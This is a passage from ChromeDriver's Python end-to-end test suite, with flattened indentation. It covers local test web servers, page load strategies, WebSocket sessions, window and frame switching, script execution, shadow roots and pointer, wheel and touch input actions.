time.sleep(timestep)
return False
class ChromeDriverBaseTestWithWebServer(ChromeDriverBaseTest):
@staticmethod
def GlobalSetUp():
ChromeDriverBaseTestWithWebServer._http_server = webserver.WebServer(
chrome_paths.GetTestData())
ChromeDriverBaseTestWithWebServer._sync_server = webserver.SyncWebServer()
cert_path = os.path.join(chrome_paths.GetTestData(),
'chromedriver/invalid_ssl_cert.pem')
ChromeDriverBaseTestWithWebServer._https_server = webserver.WebServer(
chrome_paths.GetTestData(), cert_path)
def respondWithUserAgentString(request):
return {}, """
<html>
<body>%s</body>
</html>""" % request.GetHeader('User-Agent')
def respondWithUserAgentStringUseDeviceWidth(request):
return {}, """
<html>
<head>
<meta name="viewport" content="width=device-width,minimum-scale=1.0">
</head>
<body>%s</body>
</html>""" % request.GetHeader('User-Agent')
ChromeDriverBaseTestWithWebServer._http_server.SetCallbackForPath(
'/userAgent', respondWithUserAgentString)
ChromeDriverBaseTestWithWebServer._http_server.SetCallbackForPath(
'/userAgentUseDeviceWidth', respondWithUserAgentStringUseDeviceWidth)
if _ANDROID_PACKAGE_KEY:
ChromeDriverBaseTestWithWebServer._device = (
device_utils.DeviceUtils.HealthyDevices()[0])
http_host_port = (
ChromeDriverBaseTestWithWebServer._http_server._server.server_port)
sync_host_port = (
ChromeDriverBaseTestWithWebServer._sync_server._server.server_port)
https_host_port = (
ChromeDriverBaseTestWithWebServer._https_server._server.server_port)
forwarder.Forwarder.Map(
[(http_host_port, http_host_port), (sync_host_port, sync_host_port),
(https_host_port, https_host_port)],
ChromeDriverBaseTestWithWebServer._device)
@staticmethod
def GlobalTearDown():
if _ANDROID_PACKAGE_KEY:
forwarder.Forwarder.UnmapAllDevicePorts(ChromeDriverTest._device)
ChromeDriverBaseTestWithWebServer._http_server.Shutdown()
ChromeDriverBaseTestWithWebServer._https_server.Shutdown()
@staticmethod
def GetHttpUrlForFile(file_path):
return ChromeDriverBaseTestWithWebServer._http_server.GetUrl() + file_path
class ChromeDriverTestWithCustomCapability(ChromeDriverBaseTestWithWebServer):
def testEagerMode(self):
send_response = threading.Event()
def waitAndRespond():
send_response.wait(10)
self._sync_server.RespondWithContent('#')
thread = threading.Thread(target=waitAndRespond)
self._http_server.SetDataForPath('/top.html',
"""
<html><body>
<div id='top'>
<img src='%s'>
</div>
</body></html>""" % self._sync_server.GetUrl())
eager_driver = self.CreateDriver(page_load_strategy='eager')
thread.start()
start_eager = monotonic()
eager_driver.Load(self._http_server.GetUrl() + '/top.html')
stop_eager = monotonic()
send_response.set()
eager_time = stop_eager - start_eager
self.assertTrue(eager_time < 9)
thread.join()
def testDoesntWaitWhenPageLoadStrategyIsNone(self):
class HandleRequest(object):
def __init__(self):
self.sent_hello = threading.Event()
def slowPage(self, request):
self.sent_hello.wait(2)
return {}, """
<html>
<body>hello</body>
</html>"""
handler = HandleRequest()
self._http_server.SetCallbackForPath('/slow', handler.slowPage)
driver = self.CreateDriver(page_load_strategy='none')
self.assertEquals('none', driver.capabilities['pageLoadStrategy'])
driver.Load(self._http_server.GetUrl() + '/chromedriver/empty.html')
start = monotonic()
driver.Load(self._http_server.GetUrl() + '/slow')
self.assertTrue(monotonic() - start < 2)
handler.sent_hello.set()
self.WaitForCondition(lambda: 'hello' in driver.GetPageSource())
self.assertTrue('hello' in driver.GetPageSource())
def testUnsupportedPageLoadStrategyRaisesException(self):
self.assertRaises(chromedriver.InvalidArgument,
self.CreateDriver, page_load_strategy="unsupported")
def testGetUrlOnInvalidUrl(self):
# Make sure we don't return 'chrome-error://chromewebdata/' (see
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=1272).
# Block DNS resolution for all hosts so that the navigation results
# in a DNS lookup error.
driver = self.CreateDriver(
chrome_switches=['--host-resolver-rules=MAP * ~NOTFOUND'])
self.assertRaises(chromedriver.ChromeDriverException,
driver.Load, 'http://invalid/')
self.assertEquals('http://invalid/', driver.GetCurrentUrl())
class ChromeDriverWebSocketTest(ChromeDriverBaseTestWithWebServer):
@staticmethod
def composeWebSocketUrl(server_url, session_id):
return server_url.replace('http', 'ws') + '/session/' + session_id
def testDefaultSession(self):
driver = self.CreateDriver()
self.assertFalse('webSocketUrl' in driver.capabilities)
self.assertRaises(Exception, websocket_connection.WebSocketConnection,
_CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
def testWebSocketUrlFalse(self):
driver = self.CreateDriver(web_socket_url=False)
self.assertFalse('webSocketUrl' in driver.capabilities)
self.assertRaises(Exception, websocket_connection.WebSocketConnection,
_CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
def testWebSocketUrlTrue(self):
driver = self.CreateDriver(web_socket_url=True)
self.assertTrue('webSocketUrl' in driver.capabilities)
self.assertNotEqual(None, driver.GetSessionId())
self.assertEquals(driver.capabilities['webSocketUrl'],
self.composeWebSocketUrl(_CHROMEDRIVER_SERVER_URL,
driver.GetSessionId()))
websocket = websocket_connection.WebSocketConnection(
_CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
self.assertNotEqual(None, websocket)
def testWebSocketUrlInvalid(self):
self.assertRaises(chromedriver.InvalidArgument,
self.CreateDriver, web_socket_url='Invalid')
def testWebSocketOneConnectionPerSession(self):
driver = self.CreateDriver(web_socket_url=True)
websocket = websocket_connection.WebSocketConnection(
_CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
self.assertNotEqual(None, websocket)
self.assertRaises(Exception, websocket_connection.WebSocketConnection,
_CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
def testWebSocketInvalidSessionId(self):
driver = self.CreateDriver(web_socket_url=True)
self.assertRaises(Exception, websocket_connection.WebSocketConnection,
_CHROMEDRIVER_SERVER_URL, "random_session_id_123")
def testWebSocketClosedCanReconnect(self):
driver = self.CreateDriver(web_socket_url=True)
websocket = websocket_connection.WebSocketConnection(
_CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
self.assertNotEqual(None, websocket)
websocket.Close()
websocket2 = websocket_connection.WebSocketConnection(
_CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
self.assertNotEqual(None, websocket2)
class ChromeDriverTest(ChromeDriverBaseTestWithWebServer):
"""End to end tests for ChromeDriver."""
def setUp(self):
self._driver = self.CreateDriver()
def testStartStop(self):
pass
def testGetComputedAttributes(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/accessibility.html'))
firstHeaderElement = self._driver.FindElement(
'css selector', '#first-header')
self.assertEquals(firstHeaderElement.GetComputedLabel(), 'header content')
self.assertEquals(firstHeaderElement.GetComputedRole(), 'heading')
def testGetComputedAttributesForIgnoredNode(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/accessibility.html'))
ignoredHeaderElement = self._driver.FindElement(
'css selector', '#ignored-header')
# GetComputedLabel for ignored node should return empty string.
self.assertEquals(ignoredHeaderElement.GetComputedLabel(), '')
self.assertEquals(ignoredHeaderElement.GetComputedRole(), 'none')
def testGetComputedAttributesForUnrenderedNode(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/accessibility.html'))
unrenderedHeaderElement = self._driver.FindElement(
'css selector', '#unrendered-header')
# GetComputedLabel for unrendered node should return empty string.
self.assertEquals(unrenderedHeaderElement.GetComputedLabel(), '')
self.assertEquals(unrenderedHeaderElement.GetComputedRole(), 'none')
def testLoadUrl(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
def testGetCurrentWindowHandle(self):
self._driver.GetCurrentWindowHandle()
# crbug.com/p/chromedriver/issues/detail?id=2995 exposed that some libraries
# introduce circular function references. Functions should not be serialized
# or treated as an object - this test checks that circular function
# definitions are allowed (despite how they are not spec-compliant.
def testExecuteScriptWithSameFunctionReference(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript("""function copyMe() { return 1; }
Function.prototype.foo = copyMe;
const obj = {};
obj['buzz'] = copyMe;
return obj;""")
def _newWindowDoesNotFocus(self, window_type='window'):
current_handles = self._driver.GetWindowHandles()
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/focus_blur_test.html'))
new_window = self._driver.NewWindow(window_type=window_type)
text = self._driver.FindElement('css selector', '#result').GetText()
self.assertTrue(new_window['handle'] not in current_handles)
self.assertTrue(new_window['handle'] in self._driver.GetWindowHandles())
self.assertEquals(text, 'PASS')
def testNewWindowDoesNotFocus(self):
self._newWindowDoesNotFocus(window_type='window')
def testNewTabDoesNotFocus(self):
self._newWindowDoesNotFocus(window_type='tab')
def testCloseWindow(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('css selector', '#link').Click()
new_window_handle = self.WaitForNewWindow(self._driver, old_handles)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
self.assertRaises(chromedriver.NoSuchElement,
self._driver.FindElement, 'css selector', '#link')
close_returned_handles = self._driver.CloseWindow()
self.assertRaises(chromedriver.NoSuchWindow,
self._driver.GetCurrentWindowHandle)
new_handles = self._driver.GetWindowHandles()
self.assertEquals(close_returned_handles, new_handles)
for old_handle in old_handles:
self.assertTrue(old_handle in new_handles)
for handle in new_handles:
self._driver.SwitchToWindow(handle)
self.assertEquals(handle, self._driver.GetCurrentWindowHandle())
close_handles = self._driver.CloseWindow()
# CloseWindow quits the session if on the last window.
if handle is not new_handles[-1]:
from_get_window_handles = self._driver.GetWindowHandles()
self.assertEquals(close_handles, from_get_window_handles)
def testCloseWindowUsingJavascript(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('css selector', '#link').Click()
new_window_handle = self.WaitForNewWindow(self._driver, old_handles)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
self.assertRaises(chromedriver.NoSuchElement,
self._driver.FindElement, 'css selector', '#link')
self._driver.ExecuteScript('window.close()')
with self.assertRaises(chromedriver.NoSuchWindow):
self._driver.GetTitle()
def testGetWindowHandles(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('css selector', '#link').Click()
self.assertNotEqual(None, self.WaitForNewWindow(self._driver, old_handles))
def testGetWindowHandlesInPresenceOfSharedWorker(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/shared_worker.html'))
old_handles = self._driver.GetWindowHandles()
def testSwitchToWindow(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
self.assertEquals(
1, self._driver.ExecuteScript('window.name = "oldWindow"; return 1;'))
window1_handle = self._driver.GetCurrentWindowHandle()
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('css selector', '#link').Click()
new_window_handle = self.WaitForNewWindow(self._driver, old_handles)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
self.assertRaises(chromedriver.NoSuchElement,
self._driver.FindElement, 'css selector', '#link')
self._driver.SwitchToWindow('oldWindow')
self.assertEquals(window1_handle, self._driver.GetCurrentWindowHandle())
def testEvaluateScript(self):
self.assertEquals(1, self._driver.ExecuteScript('return 1'))
self.assertEquals(None, self._driver.ExecuteScript(''))
def testEvaluateScriptWithArgs(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
script = ('document.body.innerHTML = "<div>b</div><div>c</div>";'
'return {stuff: document.querySelectorAll("div")};')
stuff = self._driver.ExecuteScript(script)['stuff']
script = 'return arguments[0].innerHTML + arguments[1].innerHTML'
self.assertEquals(
'bc', self._driver.ExecuteScript(script, stuff[0], stuff[1]))
def testEvaluateInvalidScript(self):
self.assertRaises(chromedriver.ChromeDriverException,
self._driver.ExecuteScript, '{{{')
def testExecuteAsyncScript(self):
self._driver.SetTimeouts({'script': 3000})
self.assertRaises(
chromedriver.ScriptTimeout,
self._driver.ExecuteAsyncScript,
'var callback = arguments[0];'
'setTimeout(function(){callback(1);}, 10000);')
self.assertEquals(
2,
self._driver.ExecuteAsyncScript(
'var callback = arguments[0];'
'setTimeout(function(){callback(2);}, 300);'))
def testExecuteScriptTimeout(self):
self._driver.SetTimeouts({'script': 0})
self.assertRaises(
chromedriver.ScriptTimeout,
self._driver.ExecuteScript,
'return 2')
# Regular script can still run afterwards.
self._driver.SetTimeouts({'script': 1000})
self.assertEquals(
4,
self._driver.ExecuteScript('return 4'))
def testSwitchToFrame(self):
self._driver.ExecuteScript(
'var frame = document.createElement("iframe");'
'frame.id="id";'
'frame.name="name";'
'document.body.appendChild(frame);')
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('id')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('name')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrameByIndex(0)
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame(self._driver.FindElement('tag name', 'iframe'))
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
def testSwitchToParentFrame(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/nested.html'))
self.assertTrue('One' in self._driver.GetPageSource())
self._driver.SwitchToFrameByIndex(0)
self.assertTrue('Two' in self._driver.GetPageSource())
self._driver.SwitchToFrameByIndex(0)
self.assertTrue('Three' in self._driver.GetPageSource())
self._driver.SwitchToParentFrame()
self.assertTrue('Two' in self._driver.GetPageSource())
self._driver.SwitchToParentFrame()
self.assertTrue('One' in self._driver.GetPageSource())
def testSwitchToNestedFrame(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/nested_frameset.html'))
self._driver.SwitchToFrameByIndex(0)
self._driver.FindElement("css selector", "#link")
self._driver.SwitchToMainFrame()
self._driver.SwitchToFrame('2Frame')
self._driver.FindElement("css selector", "#l1")
self._driver.SwitchToMainFrame()
self._driver.SwitchToFrame('fourth_frame')
self.assertTrue('One' in self._driver.GetPageSource())
self._driver.SwitchToMainFrame()
self._driver.SwitchToFrameByIndex(4)
self._driver.FindElement("css selector", "#aa1")
def testExecuteInRemovedFrame(self):
self._driver.ExecuteScript(
'var frame = document.createElement("iframe");'
'frame.id="id";'
'frame.name="name";'
'document.body.appendChild(frame);'
'window.addEventListener("message",'
' function(event) { document.body.removeChild(frame); });')
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('id')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.ExecuteScript('parent.postMessage("remove", "*");')
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
def testSwitchToStaleFrame(self):
self._driver.ExecuteScript(
'var frame = document.createElement("iframe");'
'frame.id="id";'
'frame.name="name";'
'document.body.appendChild(frame);')
element = self._driver.FindElement("css selector", "#id")
self._driver.SwitchToFrame(element)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
with self.assertRaises(chromedriver.StaleElementReference):
self._driver.SwitchToFrame(element)
def testGetTitle(self):
script = 'document.title = "title"; return 1;'
self.assertEquals(1, self._driver.ExecuteScript(script))
self.assertEquals('title', self._driver.GetTitle())
def testGetPageSource(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
self.assertTrue('Link to empty.html' in self._driver.GetPageSource())
def testGetElementShadowRoot(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html'))
element = self._driver.FindElement('tag name', 'custom-checkbox-element')
shadow = element.GetElementShadowRoot()
self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot))
def testGetElementShadowRootNotExists(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html'))
element = self._driver.FindElement('tag name', 'div')
with self.assertRaises(chromedriver.NoSuchShadowRoot):
element.GetElementShadowRoot()
def testFindElementFromShadowRoot(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html'))
element = self._driver.FindElement('tag name', 'custom-checkbox-element')
shadow = element.GetElementShadowRoot()
self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot))
elementInShadow = shadow.FindElement('css selector', 'input')
self.assertTrue(isinstance(elementInShadow, webelement.WebElement))
def testFindElementFromShadowRootInvalidArgs(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html'))
element = self._driver.FindElement('tag name', 'custom-checkbox-element')
shadow = element.GetElementShadowRoot()
self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot))
with self.assertRaises(chromedriver.InvalidArgument):
shadow.FindElement('tag name', 'input')
with self.assertRaises(chromedriver.InvalidArgument):
shadow.FindElement('xpath', '//')
def testDetachedShadowRootError(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html'))
element = self._driver.FindElement('tag name', 'custom-checkbox-element')
shadow = element.GetElementShadowRoot()
self._driver.Refresh()
with self.assertRaises(chromedriver.DetachedShadowRoot):
shadow.FindElement('css selector', 'input')
def testFindElementsFromShadowRoot(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html'))
element = self._driver.FindElement('tag name', 'custom-checkbox-element')
shadow = element.GetElementShadowRoot()
self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot))
elementsInShadow = shadow.FindElements('css selector', 'input')
self.assertTrue(isinstance(elementsInShadow, list))
self.assertTrue(2, len(elementsInShadow))
def testFindElementsFromShadowRootInvalidArgs(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html'))
element = self._driver.FindElement('tag name', 'custom-checkbox-element')
shadow = element.GetElementShadowRoot()
self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot))
with self.assertRaises(chromedriver.InvalidArgument):
shadow.FindElements('tag name', 'input')
with self.assertRaises(chromedriver.InvalidArgument):
shadow.FindElements('xpath', '//')
def testFindElement(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>a</div><div>b</div>";')
self.assertTrue(
isinstance(self._driver.FindElement('tag name', 'div'),
webelement.WebElement))
def testNoSuchElementExceptionMessage(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>a</div><div>b</div>";')
self.assertRaisesRegexp(chromedriver.NoSuchElement,
'no such element: Unable '
'to locate element: {"method":"tag name",'
'"selector":"divine"}',
self._driver.FindElement,
'tag name', 'divine')
def testFindElements(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>a</div><div>b</div>";')
divs = self._driver.FindElements('tag name', 'div')
self.assertTrue(isinstance(divs, list))
self.assertEquals(2, len(divs))
for div in divs:
self.assertTrue(isinstance(div, webelement.WebElement))
def testFindChildElement(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div><br><br></div><div><a></a></div>";')
element = self._driver.FindElement('tag name', 'div')
self.assertTrue(
isinstance(element.FindElement('tag name', 'br'),
webelement.WebElement))
def testFindChildElements(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div><br><br></div><div><br></div>";')
element = self._driver.FindElement('tag name', 'div')
brs = element.FindElements('tag name', 'br')
self.assertTrue(isinstance(brs, list))
self.assertEquals(2, len(brs))
for br in brs:
self.assertTrue(isinstance(br, webelement.WebElement))
def testClickElement(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("click", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.Click()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testClickElementInSubFrame(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/frame_test.html'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
# Test clicking element in the sub frame.
self.testClickElement()
def testClickElementAfterNavigation(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html'))
link = self._driver.FindElement('css selector', '#l1')
link.Click()
alert_button = self._driver.FindElement('css selector', '#aa1')
alert_button.Click()
self.assertTrue(self._driver.IsAlertOpen())
def testClickElementJustOutsidePage(self):
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=3878
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
windowHeight = self._driver.ExecuteScript('return window.innerHeight;')
self._driver.ExecuteScript(
'''
document.body.innerHTML = "<div style='height:%dpx'></div>" +
"<a href='#' onclick='return false;' id='link'>Click me</a>";
document.body.style.cssText = "padding:0.25px";
''' % (2 * windowHeight))
link = self._driver.FindElement('css selector', '#link')
offsetTop = link.GetProperty('offsetTop')
targetScrollTop = offsetTop - windowHeight + 1
self._driver.ExecuteScript('window.scrollTo(0, %d);' % (targetScrollTop));
link.Click()
def testActionsMouseMove(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("mouseover", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
actions = ({"actions": [{
"actions": [{"duration": 32, "type": "pause"}],
"id": "0",
"type": "none"
}, {
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 10, "y": 10}],
"parameters": {"pointerType": "mouse"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testActionsMouseClick(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("click", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 10, "y": 10},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0}],
"parameters": {"pointerType": "mouse"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testActionsMouseDoubleClick(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("dblclick", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 10, "y": 10},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0}],
"parameters": {"pointerType": "mouse"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testActionsMouseTripleClick(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'window.click_counts = [];'
'div.addEventListener("click", event => {'
' window.click_counts.push(event.detail);'
'});'
'return div;')
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 10, "y": 10},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0}],
"parameters": {"pointerType": "mouse"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
click_counts = self._driver.ExecuteScript('return window.click_counts')
self.assertEquals(3, len(click_counts))
self.assertEquals(1, click_counts[0])
self.assertEquals(2, click_counts[1])
self.assertEquals(3, click_counts[2])
def testActionsMouseResetCountOnOtherButton(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("dblclick", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 10, "y": 10},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0},
{"type": "pointerDown", "button": 1},
{"type": "pointerUp", "button": 1}],
"parameters": {"pointerType": "mouse"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
self.assertEquals(0, len(self._driver.FindElements('tag name', 'br')))
def testActionsMouseResetCountOnMove(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("dblclick", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 10, "y": 10},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0},
{"type": "pointerMove", "x": 30, "y": 10},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0}],
"parameters": {"pointerType": "mouse"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
self.assertEquals(0, len(self._driver.FindElements('tag name', 'br')))
def testActionsMouseDrag(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/drag.html'))
target = self._driver.FindElement('css selector', '#target')
# Move to center of target element and drag it to a new location.
actions = ({'actions': [{
"actions": [{"duration": 32, "type": "pause"},
{"duration": 32, "type": "pause"},
{"duration": 32, "type": "pause"}],
"id": "0",
"type": "none"
}, {
'type': 'pointer',
'actions': [
{'type': 'pointerMove', 'x': 100, 'y': 100},
{'type': 'pointerDown', 'button': 0},
{'type': 'pointerMove', 'x': 150, 'y': 175}
],
'parameters': {'pointerType': 'mouse'},
'id': 'pointer1'}]})
time.sleep(1)
self._driver.PerformActions(actions)
time.sleep(1)
rect = target.GetRect()
self.assertAlmostEqual(100, rect['x'], delta=1)
self.assertAlmostEqual(125, rect['y'], delta=1)
# Without releasing mouse button, should continue the drag.
actions = ({'actions': [{
"actions": [{"duration": 32, "type": "pause"}],
"id": "0",
"type": "none"
}, {
'type': 'pointer',
'actions': [
{'type': 'pointerMove', 'x': 15, 'y': 20, 'origin': 'pointer'}
],
'parameters': {'pointerType': 'mouse'},
'id': 'pointer1'}]})
time.sleep(1)
self._driver.PerformActions(actions)
time.sleep(1)
rect = target.GetRect()
self.assertAlmostEqual(115, rect['x'], delta=1)
self.assertAlmostEqual(145, rect['y'], delta=1)
# Releasing mouse button stops the drag.
actions = ({'actions': [{
"actions": [{"duration": 32, "type": "pause"},
{"duration": 32, "type": "pause"}],
"id": "0",
"type": "none"
}, {
'type': 'pointer',
'actions': [
{'type': 'pointerUp', 'button': 0},
{'type': 'pointerMove', 'x': 25, 'y': 25, 'origin': 'pointer'}
],
'parameters': {'pointerType': 'mouse'},
'id': 'pointer1'}]})
time.sleep(1)
self._driver.PerformActions(actions)
time.sleep(1)
rect = target.GetRect()
self.assertAlmostEqual(115, rect['x'], delta=1)
self.assertAlmostEqual(145, rect['y'], delta=1)
def testActionsWheelScroll(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "1000px";'
'div.addEventListener("wheel", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
time.sleep(1)
actions = ({"actions": [{
"type":"wheel",
"actions":[{"type": "scroll", "x": 10, "y": 10, "deltaX": 5,
"deltaY": 15}],
"id": "wheel1"}]})
time.sleep(1)
self._driver.PerformActions(actions)
time.sleep(1)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testActionsTouchTap(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("click", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 10, "y": 10},
{"type": "pointerDown"},
